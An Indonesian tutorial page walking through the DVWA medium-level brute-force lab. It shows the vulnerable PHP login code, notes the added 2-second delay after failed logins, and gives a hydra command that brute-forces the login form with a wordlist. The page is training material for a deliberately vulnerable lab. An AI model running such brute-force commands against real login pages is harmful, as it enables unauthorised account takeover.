> For the complete documentation index, see [llms.txt](https://notes.anggipradana.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.anggipradana.com/tutorial/dvwa/brute-force/medium.md).

# Medium

Di bawah ini adalah *source-code* dari form login level medium di DVWA.

```php
vulnerabilities/brute/source/medium.php
<?php
​
if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
​
    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );
​
    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
​
    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];
​
        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }
​
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
​
?>
```

## Mencari Informasi <a href="#mencari-informasi" id="mencari-informasi"></a>

Tidak jauh berbeda dengan level sebelumnya, hanya saja ketika gagal melakukan login akan ada jeda selama 2 detik (terlihat di baris ke-28).

Dan jika di cek menggunakan Burpsuite, yang berubah hanyalah nilai dari *cookie* `security`.

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-LzLORQjEljieIBJY-0a%2F-LzLXTEAR0D03PpPcJ2V%2FDeepinScreenshot_select-area_20200124145224.png?alt=media\&token=33fc8508-909c-4ad7-9f05-34d0612b5ebe)

## Melakukan Serangan <a href="#melakukan-serangan" id="melakukan-serangan"></a>

Karena tidak jauh berbeda dengan level yang sebelumnya, maka kita masih menggunakan perintah yang sama seperti sebelumnya, hanya saja nilai dari `security` pada *cookie* kita rubah menjadi "*medium*".

```
hydra 172.17.0.2 -l admin -P DVWA-Wordlist.txt http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie:PHPSESSID=77jr5376ldag1qc392brdr2b11; security=medium"
```

![](https://gblobscdn.gitbook.com/assets%2F-LzH5Vfe8_AlGL8KPrs2%2F-LzLORQjEljieIBJY-0a%2F-LzLYyfFCA4ZfWa0rGAl%2FDeepinScreenshot_select-area_20200124145858.png?alt=media\&token=583ec82d-540b-475c-b0a6-b8024516d8ca)

Hasilnya sama seperti sebelumnya, tetapi proses kali ini akan lebih lama karena akan terjadi *delay* 2 detik ketika gagal melakukan login.

Selamat! Kita berhasil dan akan lanjut ke level berikutnya.<br>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://notes.anggipradana.com/tutorial/dvwa/brute-force/medium.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.